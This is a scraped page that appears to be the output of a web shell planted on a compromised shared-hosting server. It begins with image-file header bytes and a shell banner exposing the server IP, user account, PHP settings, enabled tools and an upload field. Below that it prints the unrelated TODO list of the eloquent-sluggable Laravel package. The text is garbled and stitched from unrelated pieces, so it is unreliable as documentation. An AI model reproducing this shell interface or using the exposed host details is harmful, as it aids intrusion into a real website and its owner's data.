����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.190.207.221 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./cbt.bofirm.com/vendor/cviebrock/eloquent-sluggable/ |
Upload File : |
# Todos - [x] Write tests - [ ] Test events - [x] Better docblock and inline-commenting - [x] Make code style consistent - [x] Drop `develop` branch and just have `master` and tagged releases - [x] Add check that model uses softDelete trait when using `with_trashed` (see issue #47) ## Planned changes (possibly BC-breaking) for next major version - 4.0 - [x] switch default slugging method from `Str::slug` to an external package/class that can handle transliteration of other languages (e.g. https://github.com/cocur/slugify) - [x] provide interface into `cocur/slugify` to allow for custom rules, etc. - [X] convert `findBySlug` into a scope (as suggested by @unitedworks in #40) - [x] more configurable `unique` options (see issue #53) - [x] refactor, or remove, caching code (it wasn't really thought out well enough, IMO) - [x] add events, e.g. `eloquent.slug.created`, `eloquent.slug.changed`, etc. (as suggested in #96 and #101) ## Planned changes (possibly BC-breaking) for next major version - 4.3 - [x] remove unused `$model` argument from `scopeFindSimilarSlugs`